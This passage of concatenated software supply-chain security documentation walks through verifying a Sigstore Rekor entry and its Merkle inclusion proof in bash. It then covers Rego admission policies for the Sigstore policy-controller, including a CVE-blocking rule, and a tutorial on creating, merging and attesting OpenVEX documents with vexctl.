verified all the way up to the root hash of the tree. RFC 6962 explains how this works and we’ll step through this verification in a bit. For now, let’s see where this hash comes from. The RFC states that the hash of a leaf node is SHA-256(0x00 || d(n)). That is, the SHA 256 sum of the hex byte 0x00 concatenated to the contents of the entry, which in our case is the Hashed Rekord. We can do this in bash with process substitution. $ shasum -a 256 <(cat <(printf '\x00') <(jq -rcj '.' hashedrekord.json )) | cut -d ' ' -f 1 7e53fd5d089af142b7909598d214e13ca76001cc575fddaad3210adbee86363e Now let’s retrieve the entry from Rekor using this ID and save it to a file. If you inspect the contents, you’ll notice a handful of new fields. $ curl https://rekor.sigstore.dev/api/v1/log/entries/24296fb24b8ad77a7e53fd5d089af142b7909598d214e13ca76001cc575fddaad3210adbee86363e > entry.json First, let’s check that our Hashed Rekord is in the body. $ diff <(jq -rc '.[].body' entry.json | base64 -d) <(jq -rcj '.' hashedrekord.json) The body matches, which confirms that our entry was created, but how would the recipient of our message go about verifying and proving that for themselves? That’s where our next step comes in. Trust but Verify Well, there are a few important things they must check: That the message digest matches the signature for the public key inside the Hashed Rekord. (We’ll leave this as an exercise for you, dear reader: you can reverse the steps from earlier.) That we were in possession of the key when the message was signed. (You could check AWS/GCP KMS access logs) That the entry is indeed included in the transparency log. (RFC 6962) The next thing that we can verify in the entry is the Signed Entry Timestamp. I’ll leave this explanation to our friend Hayden Blauzvern. 
As a transparency log, Rekor provides cryptographic proofs of inclusion in a log. Fetching an inclusion proof requires querying the log. The log returns a checkpoint (signed tree head) as a commitment to the current state of the log and the inclusion proof. Requiring an online lookup for every entry that you’re verifying could cause a lot of increased latency in a verifier, and requires that the log have very high availability. Ideally, Rekor could provide an inclusion proof that could be verified offline – Rekor does this with a “signed entry timestamp” (SET). An SET is a structure signed with the same private key that signs Rekor’s checkpoints. It is a “promise” of inclusion. It does not contain cryptographic proof, but since it is signed by the log, the log is committing to including the entry. A verifier that trusts Rekor can verify the SET without needing to do an online lookup. Asynchronously, for additional assurances, a log monitor can verify that an entry is truly present in the log for each SET a verifier views. We can start by fetching Rekor’s current public key. $ curl https://rekor.sigstore.dev/api/v1/log/publicKey > rekor.pub Next we can pull the SET out of the entry into its own file. jq -r '.[].verification.signedEntryTimestamp' entry.json | base64 -d > set.sig The attestation and verification fields in the entry are not included in what is signed by the timestamping authority, so let’s remove them. jq -cj '.[] | del(.attestation, .verification)' entry.json > set.json Finally, we can verify the SET. $ openssl dgst -sha256 -verify rekor.pub -signature set.sig set.json Verified OK The last thing we need to verify is that our entry was actually included in the Merkle tree. As mentioned earlier, this is defined in RFC 6962. RFC 9162 will eventually replace 6962 and the pseudocode is easier to follow (read through it first). What follows is a bash implementation of this algorithm that I am equally proud of and upset by. It builds on everything we’ve covered so far with the addition of the xxd tool. xxd is used to convert between binary and hex and we use it to build up the binary representation of our tree nodes from the hashes in our entry. These hashes should eventually compute to the rootHash. #!/usr/bin/env bash set -euo pipefail # https://datatracker.ietf.org/doc/rfc9162/#:~:text=2.1.3.2.%20%20Verifying%20an%20Inclusion%20Proof entry=$(cat entry.json) mapfile -t hashes < <(jq -rc '.[].verification.inclusionProof.hashes | .[]' <<< "$entry") rootHash=$(jq -r '.[].verification.inclusionProof.rootHash' <<< "$entry") startHash=$(shasum -a 256 <(cat <(printf '\x00') <(jq -r '.[].body' <<< "$entry" | base64 -d)) | cut -d ' ' -f 1) logIndex=$(jq -r '.[].verification.inclusionProof.logIndex' <<< "$entry") treeSize=$(jq -r '.[].verification.inclusionProof.treeSize' <<< "$entry") if [[ $logIndex -ge $treeSize ]]; then echo "verification failed! log index larger than tree size" exit 1 fi echo -e "0x00 || leaf\nstart: ${startHash}\n\n" echo -e "want: ${rootHash}\n\n" r="${startHash}" fn="${logIndex}" sn=$(( treeSize - 1 )) for i in "${!hashes[@]}" do if [[ $sn -eq 0 ]]; then echo "verification failed! 
tree is incomplete" exit 1 fi lsb=$(( fn & 1 )) if [[ ($lsb -eq 1) || ($fn -eq $sn) ]]; then echo "0x01 || ${hashes[i]}|| ${r}" r=$(shasum -a 256 <(cat <(printf '\x01') <(xxd -r -p <<< "${hashes[i]}") <(xxd -r -p <<< "${r}")) | cut -d ' ' -f 1) while [[ ($lsb -eq 0) || $fn -eq 0 ]]; do fn=$(( fn >> 1 )) sn=$(( sn >> 1)) lsb=$(( fn & 1 )) done else echo "0x01 || ${r}|| ${hashes[i]}" r=$(shasum -a 256 <(cat <(printf '\x01') <(xxd -r -p <<< "${r}") <(xxd -r -p <<< "${hashes[i]}")) | cut -d ' ' -f 1) fi fn=$(( fn >> 1 )) sn=$(( sn >> 1)) echo -e "${r}\n\n" done if [[ "${r}" == "${rootHash}" ]]; then echo "verification successful! got: ${r}want: ${rootHash}" exit 0 else echo "verification failed! got: ${r}want: ${rootHash}" exit 1 fi Running this monstrosity, we can see that verification was successful! $ ./verify.sh ./verify.sh 0x00 || leaf start: 7e53fd5d089af142b7909598d214e13ca76001cc575fddaad3210adbee86363e want: b054e63c475d8751b14b51a54255918e4ae0aa26e0ee60c9c7ee3e333396c4ad 0x01 || 2fb6c414fe3710a0ca820e20a352d827e920ef94de1a62cf032f0b508583d343 || 7e53fd5d089af142b7909598d214e13ca76001cc575fddaad3210adbee86363e 16e4d477cd081846cd410daf07299d17056dc5b31f77c40a716e8520a0457b1c 0x01 || af8df402b3a2f95a2e11e693d0401237c23ab1ef29844ff5b122ef7b868eb802 || 16e4d477cd081846cd410daf07299d17056dc5b31f77c40a716e8520a0457b1c 6e76df3263704eccc1c047bbc1704bbf8071a817a0c5626a2308da7d9bf3cae9 0x01 || 54b4fb9c6af94d6c8c9361176de175cb26334f26cf0c2238c8dda23ca256f7b1 || 6e76df3263704eccc1c047bbc1704bbf8071a817a0c5626a2308da7d9bf3cae9 dff1cbc7728565c69328b8618b14fe7033baa5e8936098ec8933009c3988104e 0x01 || dff1cbc7728565c69328b8618b14fe7033baa5e8936098ec8933009c3988104e || 7e12ab8d4338713ca3a427db4eb41ecdbe3e6ae15fd490716409d8c89c63ae1d 6ad77f4dcac7a5d47d3087283129429d50cd2d9a4410f5d4900afd78e33ad40a 0x01 || 94cc41349e90789f7f80dce5df0339373749400539d41c8a3ecca485e3c92603 || 6ad77f4dcac7a5d47d3087283129429d50cd2d9a4410f5d4900afd78e33ad40a 4fdd278ae02e4cbae8dbc0650e4d3282e208ffec9603c68f73bcafe328488ac7 0x01 || a50a2b2e4a506dd075f59dab6db168164eb52e437756f53162f04be6ce0b5c3b || 4fdd278ae02e4cbae8dbc0650e4d3282e208ffec9603c68f73bcafe328488ac7 65cfed18ce41b642653912e86402b45d5df0109de29edbf0cb20c62f3444fdc0 0x01 || 65cfed18ce41b642653912e86402b45d5df0109de29edbf0cb20c62f3444fdc0 || 52f10e8d704883a11ed3f157d079afffd814f563d5c013d5752ea81744aac4b5 749a1795a60841356d1928b78af94814b127b7fea9aede093eb39b410e166f27 0x01 || a0441f106e6bb9ec4acc5f3126beea2ae60b721648c3c7ba741368458cef89c6 || 749a1795a60841356d1928b78af94814b127b7fea9aede093eb39b410e166f27 5d0ebe394bc76ddf46868b03466d3042b4efcb70760f997731ee6758c272208f 0x01 || 5d0ebe394bc76ddf46868b03466d3042b4efcb70760f997731ee6758c272208f || df2f19f10ed0def555c68cda80b4fdd8f535ba929c1cfc36d9c789732d20e305 9138f73ed31973bab8e005465ee04bec1cfb2a56e0f6eb9f316d964127c9877e 0x01 || 9138f73ed31973bab8e005465ee04bec1cfb2a56e0f6eb9f316d964127c9877e || 93663301e472c817961f75499d26844b246665d275538e5a24e16b065cda7afe 874589aee5388025c078a59e1f6e66ac65d185cdc766620860ba0680cfbd26bc 0x01 || c2ed30483aafe58267a6740c2fb76408eb6366ceb48c9f0509c0f2c04b101f05 || 874589aee5388025c078a59e1f6e66ac65d185cdc766620860ba0680cfbd26bc 0926480781b8d7bc2790d7e63972846bf98b79b47a1968a47f9c0992f319da44 0x01 || b593f43b0ca6048ca4e1564817b0381f25f66d6c6b205673d6e6bc1c582a02bd || 0926480781b8d7bc2790d7e63972846bf98b79b47a1968a47f9c0992f319da44 1af9b80f354a6c824fe9893f7278ce192dea39f4cb800707681947408b9f8c60 0x01 || b8f5ef19b43c82a6deee74a4b36c41a4b7f030d46f9862913ae5ab74177d7a34 || 
1af9b80f354a6c824fe9893f7278ce192dea39f4cb800707681947408b9f8c60 b76bf4a5ee7dbf09372243c01c86d620fc3581e8c4b5659ce549b397ec9608bc 0x01 || 0b4e9c3dce66ce4f393b3b3ae5f141a0d20902538d5fc99bd030348672b69b81 || b76bf4a5ee7dbf09372243c01c86d620fc3581e8c4b5659ce549b397ec9608bc 31fcf995aaadf0cc7ce249b3ae06fb73653648c6279dd8401a75e59538a85718 0x01 || 9a991dc567e6dd4fa21d6235df691252ca81eab5e1301c849c8aa2151363e6a7 || 31fcf995aaadf0cc7ce249b3ae06fb73653648c6279dd8401a75e59538a85718 36a05fd84e2e4f497a41a3e6e633b59a49873d731e1d4e2e5c91ecb5ece28091 0x01 || 732af72ebcc0c8a16dbdba657c7b755d2097691d08882f308dbc5b133372c170 || 36a05fd84e2e4f497a41a3e6e633b59a49873d731e1d4e2e5c91ecb5ece28091 5219998b60322aa7e1aa3c02cf15bedc67d89876dfc46f1b89937c8e496aa947 0x01 || 2747468d0ed5e5b1138bba7b7968367a9842437d9004b3166391f115cb867d1e || 5219998b60322aa7e1aa3c02cf15bedc67d89876dfc46f1b89937c8e496aa947 b054e63c475d8751b14b51a54255918e4ae0aa26e0ee60c9c7ee3e333396c4ad verification successful! got: b054e63c475d8751b14b51a54255918e4ae0aa26e0ee60c9c7ee3e333396c4ad want: b054e63c475d8751b14b51a54255918e4ae0aa26e0ee60c9c7ee3e333396c4ad This is the same flow that the Rekor CLI will step through. $ rekor-cli verify --uuid 24296fb24b8ad77a7e53fd5d089af142b7909598d214e13ca76001cc575fddaad3210adbee86363e Current Root Hash: f0e0de7e6b03385bc086c46703b7a2abbbd16ae10fc28b3f480125b1898536fb Entry Hash: 24296fb24b8ad77a7e53fd5d089af142b7909598d214e13ca76001cc575fddaad3210adbee86363e Entry Index: 7155742 Current Tree Size: 2995354 Checkpoint: rekor.sigstore.dev - 2605736670972794746 2995354 8ODefmsDOFvAhsRnA7eiq7vRauEPwos/SAElsYmFNvs= Timestamp: 1668548431487913062 — rekor.sigstore.dev wNI9ajBEAiB/Lcxmn82//9QIwqVPbVSgzEAfACmAnZNLD9RuIH9QiAIgLToW3Bd8Y26Wwz3JuuZBsC1/IhUExSbu1NET/nzoajc= Inclusion Proof: SHA256(0x01 | 24296fb24b8ad77a7e53fd5d089af142b7909598d214e13ca76001cc575fddaad3210adbee86363e | 2fb6c414fe3710a0ca820e20a352d827e920ef94de1a62cf032f0b508583d343) = 768fdb04aac9d523a34adbfeecd3268f920ff250ffc809867bae28bd10eb5f15 … If you have any question you can reach me @eddiezane! Stay spooky… Special thanks to Appu Goundan and Hayden Blauzvern. --- ### Limit High or Critical CVEs in your Images Workloads URL: https://edu.chainguard.dev/open-source/sigstore/policy-controller/policies/critical-cve-policy/ Last Modified: May 10, 2024 Tags: policy-controller, Policies, Open Source While Common Vulnerabilities and Exposures (CVEs) are undesirable at any time, the software security standards of certain industries strictly regulate the allowance of high or critical CVEs. For example, in the payment industry, the PCI Security Standards Council requires that all vulnerabilities with a Common Vulnerability Scoring System (CVSS) score higher than 4 are addressed. For engineers and security professionals working in these contexts, it’s essential to know if container images have high or critical CVEs before deploying them. But tracking these CVEs manually can be difficult, especially when regularly pulling or updating large numbers of images for your workloads. Policy solution: vulnerability attestation with no high or critical CVEs One way of addressing this concern is to use Chainguard’s policy that checks an image’s attestation to determine whether the image has any high or critical CVEs. Used with an admissions controller or the open source Sigstore policy-controller), this policy enables you to restrict images or receive a warning whenever an image fails to meet the policy’s requirements. 
For this policy to work, the image under inspection must have an attached attestation containing output from its vulnerability scan. These vulnerability attestations are typically generated by the upstream maintainer who inserts the output of an image's vulnerability scan into a vulnerability attestation and then signs the attestation to assure downstream users of its integrity. If the image doesn't have a vulnerability attestation or you want to double-check the attestation, you can also create a vulnerability attestation yourself using a scanner like Trivy. In either case, the vulnerability attestation is checked by this policy to determine whether the image contains any high or critical vulnerabilities. Here is the policy in full: ############################################################################################# # To generate an attestation with a scan report and attest it to an image follow these steps: # $ trivy image --format cosign-vuln --output vuln.json <IMAGE> # $ cosign attest --key /path/to/cosign.key --type https://cosign.sigstore.dev/attestation/vuln/v1 --predicate vuln.json <IMAGE> # # $ cosign verify-attestation --key /path/to/cosign.pub --type https://cosign.sigstore.dev/attestation/vuln/v1 <IMAGE> ############################################################################################# apiVersion: policy.sigstore.dev/v1beta1 kind: ClusterImagePolicy metadata: name: vuln-no-high-or-critical-rego annotations: catalog.chainguard.dev/title: Fail on high or critical CVEs catalog.chainguard.dev/description: Vulnerability attestation with no High or Critical CVEs catalog.chainguard.dev/labels: attestation,rego spec: images: - glob: "**" authorities: - name: my-authority key: # REPLACE WITH YOUR PUBLIC KEY! data: | -----BEGIN PUBLIC KEY----- MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAESWmPfv6b083TNcwY4SlYcZULn7jX /vfUyU7CPr2zssLc3+8SWAv2ZY59pofKnvYBp9dNiNwVTkrxab1bcpocVg== -----END PUBLIC KEY----- attestations: - name: must-not-have-high-critical-cves predicateType: https://cosign.sigstore.dev/attestation/vuln/v1 policy: type: rego data: | package sigstore isCompliant[response] { input.predicateType = "https://cosign.sigstore.dev/attestation/vuln/v1" filteredHighSeverity = [c | c := input.predicate.scanner.result.Results[_].Vulnerabilities[_]; c.Severity == "HIGH"] filteredCriticalSeverity = [c | c := input.predicate.scanner.result.Results[_].Vulnerabilities[_]; c.Severity == "CRITICAL"] result = ((count(filteredHighSeverity) + count(filteredCriticalSeverity)) == 0) errorMsg = sprintf("Found HIGH '%d' and CRITICAL '%d' vulnerabilities", [count(filteredHighSeverity), count(filteredCriticalSeverity)]) warnMsg = "" response := { "result" : result, "error" : errorMsg, "warning" : warnMsg } } Implementing this policy You can use this policy freely with the open source Sigstore policy-controller to block new deployments of images that don't meet the policy's requirements. --- ### Rego Policies URL: https://edu.chainguard.dev/open-source/sigstore/policy-controller/policies/chainguard-enforce-rego-policies/ Last Modified: May 10, 2024 Tags: Open Source, Procedural, Policy, Reference, SBOM The Sigstore Policy Controller supports the Rego Policy Language, which is a declarative policy language that is used to evaluate structured input data such as Kubernetes manifests and JSON documents.
This feature enables users to apply policies that can evaluate Kubernetes admission requests and object metadata to make comprehensive decisions about the workloads that are admitted to their clusters. Rego support also enables users to enhance existing cloud-native policies by adding additional software supply chain security checks. If you would like to write a Rego policy from scratch, or learn more about how to use this format, you can follow this guide. Rego Policy Template # Copyright 2022 Chainguard, Inc. # SPDX-License-Identifier: Apache-2.0 apiVersion: policy.sigstore.dev/v1beta1 kind: ClusterImagePolicy metadata: name: my-rego-policy spec: images: [glob: '**'] authorities: [static: {action: pass}] mode: warn policy: includeSpec: true type: rego data: | package sigstore default isCompliant = false isCompliant { # Rego logic goes here; must evaluate to true for policy to pass } In this policy, you should change the name to be meaningful to you. The spec fields are defined at ClusterImagePolicySpec. By default, this policy will apply to all images, as noted with the glob: '**' parameter. If we keep this as is, this means that we are evaluating everything running in our cluster. The authorities field is used in evaluating image signatures. Since we aren't using signatures in this policy, we will set it to pass. This will be a common setting in Rego-based policies unless you are also evaluating signatures simultaneously. The policy is being implemented in warn mode, which can generate an alert through CloudEvents to notify administrators of violations without blocking deployments. You can alternatively use mode: enforce to block deployments that violate the policy. The Rego policy itself is defined within the policy section. The first requirement is to include the input data that is to be evaluated. By default, the image in the registry is available. To include additional metadata, one or more of the following should be set: includeSpec: allows you to access the fields in the spec portion of the Kubernetes manifest, including the container configuration, image names, replicas, resources, and more. includeObjectMeta: allows you to access the fields in the metadata: portion of the manifest, including the object's name and labels. includeTypeMeta: allows access to the top level fields in the manifest, such as the kind and apiVersion. fetchConfigFile: fetches the OCI config file from the registry, which contains metadata about the image in the registry. Rego policies must specify type: rego and the data field must contain package sigstore. For the policy to pass, the isCompliant field must evaluate to true within the curly braces. The isCompliant Boolean is set to false by default, and the logic in the braces must flip the Boolean to true for the policy to pass. If you define multiple conditions within the isCompliant braces, they are combined with logical AND, meaning that each condition must pass for isCompliant to resolve to true. You can also define multiple evaluations (meaning, multiple sets of isCompliant braces) in the same policy. These are combined with logical OR, meaning that if any of the stated rule bodies evaluates to true, then the isCompliant Boolean will also be true. This same structure must be present in all Rego-based policies. Rego Policy to Check Metadata Labels You can set a Rego policy to check for certain labels within your metadata.
For example, within the production environment (with the "production" label) you can ensure that the compliance team is the approver. isCompliant { input.metadata.labels.env == "production" input.metadata.labels["approved-by"] == "compliance-team" } Here, the policy is requiring and checking that the labels exist in the ObjectMeta data. This policy will evaluate to true only if both labels exist in the metadata portion of the manifest. Rego Policy to Check Kubernetes Pod Security As a cluster-level resource, a Kubernetes Pod Security Policy allows a cluster administrator to control security-sensitive aspects of a Pod's specification. This defines a set of conditions that a Pod must meet so that it can be allowed into the cluster. You can think of it as a built-in admission controller which enforces security policies on Pods across a cluster. This policy checks to make sure our Pod security specifications are properly set. isCompliant { input.spec.hostNetwork == "false" input.spec.hostPID == "false" input.spec.hostIPC == "false" } Here, hostNetwork refers to the host's networking namespace, hostPID refers to the host process ID namespace, and hostIPC refers to the IPC (interprocess communication) namespace. This policy will pass if all the restricted values are set to false. Rego Policy that Disallows Specified Images In some cases, you may want to evaluate an item elsewhere in the manifest, such as an image source that is included within the container specs of the same manifest. For example, a manifest may have a snippet with a disallowed NGINX image from Docker Hub: spec: containers: - name: "your-container-name" image: nginx:latest - name: "another-container-name" image: nginx In this case, within the policy section of your Rego policy, you'll need to iterate over the image array and check all the relevant fields for the restricted value. You can use the [_] syntax to iterate through the array. You can use the not keyword in conjunction with the contains() built-in function to evaluate all the items within the array. isCompliant { result := input.spec.containers[_].image not contains(result, "docker.io") } This policy will not admit Pods that come from docker.io. Rego Policy that Disallows Privilege Escalation in Pods This example Rego policy will disallow privilege escalation in Pods following the Kubernetes Pod Security Baseline Standard. The Baseline Standard is a minimally restrictive policy which prevents known privilege escalations and allows the default and minimally specified Pod configuration. isCompliant { filteredContainers = [c | c := input.spec.containers[_]; c.securityContext.allowPrivilegeEscalation == true ] filteredInitContainers = [c | c := input.spec.initContainers[_]; c.securityContext.allowPrivilegeEscalation == true ] filteredEphemeralContainers = [c | c := input.spec.ephemeralContainers[_]; c.securityContext.allowPrivilegeEscalation == true ] (count(filteredContainers) + count(filteredInitContainers) + count(filteredEphemeralContainers)) == 0 } Setting the allowPrivilegeEscalation Boolean controls whether a process can gain more privileges than its parent process. This value will evaluate to true when the container is run as privileged. You can review more information about how to configure a security context for a Pod or Container on the Kubernetes docs. This Rego policy shows a method of declaring a variable and using it to count up all the instances of privilege escalation across Pod types, and evaluating that the final count is 0 in order for the policy to pass.
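If you want to experiment with isCompliant rules like these before wiring them into a ClusterImagePolicy, one option is to evaluate them locally with the open source opa CLI. This is only a sketch for local testing: opa is not part of the Policy Controller, the file names are made up for the example, and the rule below is a trimmed-down version of the privilege escalation check that only looks at regular containers.

# Write a minimal policy file containing a trimmed-down privilege escalation rule
cat <<'EOF' > policy.rego
package sigstore

default isCompliant = false

isCompliant {
  filteredContainers = [c | c := input.spec.containers[_]; c.securityContext.allowPrivilegeEscalation == true]
  count(filteredContainers) == 0
}
EOF

# A sample Pod spec fragment that should fail the check
cat <<'EOF' > input.json
{"spec": {"containers": [{"name": "app", "securityContext": {"allowPrivilegeEscalation": true}}]}}
EOF

# Evaluate the rule locally; this input should print "false"
opa eval --format pretty -i input.json -d policy.rego "data.sigstore.isCompliant"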
Rego Policy that Checks Maximum Age of Images This example Rego policy checks the maximum age (in days) allowed for an image running in your cluster. Policy Controller measures this through the created field of a container image’s configuration. This ensures that your images are regularly updated and maintained. Note that some build tools may fail this check due to using a fixed time (like the Unix epoch) for creation in their reproducible builds. However, many of these tools support specifying SOURCE_DATE_EPOCH, which aligns creation time with the date of the source commit. policy: fetchConfigFile: true type: "rego" data: | package sigstore nanosecs_per_second = 1000 * 1000 * 1000 nanosecs_per_day = 24 * 60 * 60 * nanosecs_per_second # Change this to the maximum number of days you would like to allow maximum_age = 30 * nanosecs_per_day default isCompliant = false isCompliant { created := time.parse_rfc3339_ns(input.config[_].created) time.now_ns() < created + maximum_age } Here, the policy defines a variable for the maximum_age, in this case set to 30, which you can change to the number of days old you would permit an image to be. Within the isCompliant braces, the Rego policy leverages time to evaluate whether the current time is less than the maximum allowed age. To review the different methods of implementing time within Rego, review the Time reference documentation. Rego Policies that Define Custom Error and Warning Messages Rego policies have the added benefit of allowing you to define custom error and warning messages. This example attestations block requires clusters to have a vulnerability report in order to be deemed compliant. Notice, though, that it also defines an errorMsg string. attestations: - name: must-have-vuln-report predicateType: vuln policy: type: rego data: | package sigstore isCompliant[response] { result = (input.predicateType == "chainguard.dev/attestation/vuln/v1") errorMsg = "Not found expected predicate type 'chainguard.dev/attestation/vuln/v1'" warnMsg = "" response := { "result" : result, "error" : errorMsg, "warning" : warnMsg } } Here, the custom error message reads Not found expected predicate type 'chainguard.dev/attestation/vuln/v1'. Rather than returning the default error, Policy Controller will return this string as a custom error message. Notice, too, that the previous example defines a warnMsg variable. Policy Controller will only return a warning message to the caller if the policy in question is in warn mode, so in that case it was left as an empty string. The following attestations block is similar to the previous one, but this time it defines the warnMsg variable to be used as a custom warning message. attestations: - name: must-have-vuln-report predicateType: vuln policy: type: rego data: | package sigstore isCompliant[response] { result = (input.predicateType == "cosign.sigstore.dev/attestation/vuln/v1") errorMsg = "" warnMsg = "WARNING: Found an attestation with predicate type 'cosign.sigstore.dev/attestation/vuln/v1'" response := { "result" : result, "error" : errorMsg, "warning" : warnMsg } } Defining custom error and warning messages with Rego can help with troubleshooting, as they can explain specific policy issues that otherwise may not be clearly understandable. Learn More To understand more about the Rego policy format, you can review the Rego Policy Reference which includes details on assignment and equality, arrays, objects, sets, and rules. 
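As a practical aside before moving on, you can inspect the created timestamp that the maximum-age policy above evaluates by pulling an image's config yourself. This sketch assumes you have the crane and jq tools installed, uses cgr.dev/chainguard/nginx:latest purely as an example image, and mirrors the policy's 30-day default using GNU date syntax:

# Print the created timestamp from the image config (the field the max-age policy reads)
crane config cgr.dev/chainguard/nginx:latest | jq -r '.created'

# Roughly reproduce the 30-day check from the policy
created=$(crane config cgr.dev/chainguard/nginx:latest | jq -r '.created')
if [ "$(date -d "$created" +%s)" -ge "$(date -d '30 days ago' +%s)" ]; then
  echo "image is newer than 30 days"
else
  echo "image is older than 30 days"
fi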
--- ### Getting Started with OpenVEX and vexctl URL: https://edu.chainguard.dev/open-source/sbom/getting-started-openvex-vexctl/ Last Modified: May 21, 2024 Tags: SBOM, VEX, Procedural The vexctl CLI is a tool to make VEX work. As part of the open source OpenVex project, vexctl enables you to create, apply, and attest VEX (Vulnerability Exploitability eXchange) data in order to filter out false positive security alerts. The vexctl tool was built to help with the creation and management of VEX documents, communicate transparently to users as time progresses, and enable the "turning off" of security scanner alerts of vulnerabilities known not to affect a given product. Using VEX, software authors can communicate to their users that an otherwise vulnerable component has no security implications for their product. This tutorial will walk you through some common commands in vexctl. Installing vexctl If you would like to install vexctl on your local or virtual machine, you will need Go 1.16 or higher. You can install Go by following the official Go documentation. Using Go, run the following to install vexctl: go install github.com/openvex/vexctl@latest This command will install the latest version of vexctl on your machine. Confirming Installation You can confirm that vexctl was installed and is ready to use by running the following command: vexctl version You should receive output similar to the following. _ _ _____ __ __ _____ _____ _ | | | || ___|\ \ / // __ \|_ _|| | | | | || |__ \ V / | / \/ | | | | | | | || __| / \ | | | | | | \ \_/ /| |___ / /^\ \| \__/\ | | | |____ \___/ \____/ \/ \/ \____/ \_/ \_____/ vexctl: A tool for working with VEX data GitVersion: ... ... Platform: ... This indicates the current version of vexctl on your working machine. You are ready to proceed with working with vexctl. Creating VEX Documents With vexctl, VEX data can be created to a file on disk, or it can be captured in a signed attestation that can be attached to a container image. You can create a VEX document by using the vexctl create command. For example, to create a VEX document with a single statement asserting that the WolfiOS package git-2.38.1-r0 is not affected by a given common vulnerability and exposure (CVE) — let's say, CVE-2014-123456 — because it has already been mitigated in the distribution, you can run the following. vexctl create --product="pkg:apk/wolfi/git@2.38.1-r0?arch=x86_64" \ --vuln="CVE-2014-123456" \ --status="not_affected" \ --justification="inline_mitigations_already_exist" This command notes the following: The software product — product — in this case a Wolfi package The vulnerability — vuln — in this case a specific CVE The current status — status — which can be not_affected, affected, fixed, or under_investigation When the status is noted as not_affected, the reason for the status — justification — must be included, and can read inline_mitigations_already_exist or component_not_present The vexctl create command above renders the following document. { "@context": "https://openvex.dev/ns", "@id": "https://openvex.dev/docs/public/vex-cfaef18d38537412a0307ec266bed56aa88fa58b7c1f2c6b8c9ef997028ba4bd", "author": "Unknown Author", "role": "Document Creator", "timestamp": "2023-01-10T20:24:50.498233798-06:00", "version": "1", "statements": [ { "vulnerability": "CVE-2014-123456", "products": [ "pkg:apk/wolfi/git@2.38.1-r0?arch=x86_64" ], "status": "not_affected", "justification": "inline_mitigations_already_exist" } ] } You can also create a VEX document with abbreviated information.
For instance, when a given CVE was addressed in the image and you want to attest that it has been fixed: vexctl create "pkg:apk/wolfi/git@2.39.0-r1?arch=x86_64" CVE-2023-12345 fixed The above workflow demonstrates how to create a VEX document with vexctl on the command line. Merging Existing VEX Documents When more than one stakeholder is issuing VEX metadata about a piece of software, vexctl can merge the documents to get the most up-to-date impact assessment of a vulnerability. Let's begin with two test documents. You can create these two test documents with a CLI editor such as nano. The first document is document1.vex.json: { "@context": "https://openvex.dev/ns/v0.2.0", "@id": "https://openvex.dev/docs/public/vex-0f3be8817faafa24e4bfb3d17eaf619efb1fe54923b9c42c57b156a936b91431", "author": "John Doe", "role": "Senior Trusted VEX Issuer", "version": 1, "statements": [ { "vulnerability": { "name": "CVE-1234-5678" }, "products": [ { "@id": "pkg:apk/wolfi/bash@1.0.0" } ], "status": "under_investigation", "timestamp": "2023-12-05T05:04:34.77929922Z" } ], "timestamp": "2023-12-05T05:04:34.77929844Z" } The second document is document2.vex.json: { "@context": "https://openvex.dev/ns/v0.2.0", "@id": "https://openvex.dev/docs/public/vex-3cd938c9a706eba0915883640116cfe813f7d59150cf758b8c869b4926a7cf11", "author": "John Doe", "role": "Senior Trusted VEX Issuer", "version": 1, "statements": [ { "vulnerability": { "name": "CVE-1234-5678" }, "products": [ { "@id": "pkg:apk/wolfi/bash@1.0.0" } ], "status": "fixed", "timestamp": "2023-12-05T05:06:38.099731287Z" } ], "timestamp": "2023-12-05T05:06:38.099730576Z" } The two files are generated from a known rule set, also known as "golden data" or a "golden file," which is reused and reapplied to new releases of the same project. We can merge the two VEX documents with the vexctl merge command: vexctl merge --product=pkg:apk/wolfi/bash@1.0.0 \ document1.vex.json \ document2.vex.json The resulting document combines the VEX statements that express data about bash@1.0.0 into a single document. { "@context": "", "@id": "merged-vex-67124ea942ef30e1f42f3f2bf405fbbc4f5a56e6e87684fc5cd957212fa3e025", "author": "Unknown Author", "role": "Document Creator", "timestamp": "2023-02-03T21:48:39.582648-05:00", "version": "", "statements": [ { "vulnerability": "CVE-1234-5678", "timestamp": "2022-12-22T16:36:43-05:00", "products": [ "pkg:apk/wolfi/bash@1.0.0" ], "status": "under_investigation" }, { "vulnerability": "CVE-1234-5678", "timestamp": "2022-12-22T20:56:05-05:00", "products": [ "pkg:apk/wolfi/bash@1.0.0" ], "status": "fixed" } ] } This final document tells the whole story of how CVE-1234-5678 was under_investigation and then fixed four hours later, all documented in a single VEX file that was merged with vexctl. Attesting and Attaching VEX Documents To attest to and attach VEX statements within a given document to a container image, you can use the vexctl attest command with the --attach and --sign flags. For example, if you have a container image your-username/your-container-image:latest in a container registry, and a related VEX document hello.vex.json, you can run the following command to attest to that document, attach the document and sign that attestation. If you want to try this example, make sure to replace your-username/your-container-image:latest with the path to your container. vexctl attest --attach --sign hello.vex.json your-username/your-container-image:latest Upon running this command, you'll be taken through a signing workflow with Sigstore.
Your terminal output will indicate your progress. Generating ephemeral keys... Retrieving signed certificate... A browser window will open for you to select an OIDC provider. When the attestation is complete, you'll receive feedback that it was successful. Successfully verified SCT... {"payloadType":"application/vnd.in-toto+json","payload":"e...o=","signatures":[{"keyid":"","sig":"MEY...z"}]} This attestation, with a .att extension, will now live in the container registry as an attachment to your container. Chronology and VEX Documents Assessing the impact of CVEs on a software product is a process that takes time, and the status will change over time. VEX is designed to communicate with users as the status changes, and there may therefore be multiple VEX documents associated with a product. To understand how this may work in practice, below is an example timeline for the VEX documents associated with a given product and CVE. The software product Linky App becomes aware of CVE-2014-123456, associated with one of its components. Linky App developers issue a VEX data file with a status of under_investigation to inform their users that they are aware of the CVE, but are reviewing whether it has an impact on Linky App. After investigation, the developers determine the CVE has no impact on Linky App because the vulnerable function in the component is never executed. The developers issue a second VEX document with a status of not_affected using the vulnerable_code_not_in_execute_path justification. When analyzing the VEX documents associated with Linky App, vexctl will review them chronologically and "replay" the known impact statuses in the order they were found, effectively computing the not_affected status. If a SARIF scanner report is then filtered with vexctl using this VEX data, any entries alerting of CVE-2014-123456 will be filtered out. Learn More The vexctl tool is open source; you can review the vexctl repository on GitHub, as well as the go-vex Go library for generating, consuming, and operating on VEX documents. The following blog posts have some background about VEX and OpenVEX: What is OpenVex Putting VEX To Work Reflections on Trusting VEX (or when humans can improve SBOMs) Understanding The Promise of VEX The OpenVEX Specification is owned and steered by the community. You can find the organization page with additional repositories at openvex.dev. --- ### melange Overview URL: https://edu.chainguard.dev/open-source/build-tools/melange/overview/ Last Modified: August 1, 2024 Tags: melange, Overview melange is an apk builder tool that uses declarative pipelines to create apk 